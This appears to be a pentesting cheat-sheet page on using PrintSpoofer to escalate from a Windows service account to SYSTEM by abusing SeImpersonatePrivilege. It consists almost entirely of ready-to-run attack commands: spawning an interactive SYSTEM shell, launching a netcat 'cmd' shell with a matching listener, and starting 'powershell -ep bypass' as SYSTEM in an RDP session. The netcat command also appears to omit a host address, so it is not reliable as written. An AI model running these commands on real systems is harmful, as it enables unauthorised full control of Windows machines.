Printspoofer / SEImpersonate

From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.

Spawn a SYSTEM process and interact with it

If you have an interactive shell, you can create a new SYSTEM process in your current console.

PrintSpoofer.exe -i -c cmd

Spawn a SYSTEM process and exit

If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.

Use case: WinRM, WebShell,,, etc.

PrintSpoofer.exe -c "C:\TOOLS\nc.exe 1337 -e cmd"

Netcat listener:

nc.exe -l -p 1337

Spawn a SYSTEM process on a desktop

If you are logged on locally or via RDP (including VDI), you can spawn a SYSTEM command prompt on your desktop. First, check your session ID with the command qwinsta and then specify this value with the option -d.

Use case: Terminal Session (RDP), VDI


# check your session ID

PrintSpoofer.exe -d [rdp session id number] -c "powershell -ep bypass"

PrintSpoofer.exe -d 3 -c "powershell -ep bypass"

Last updated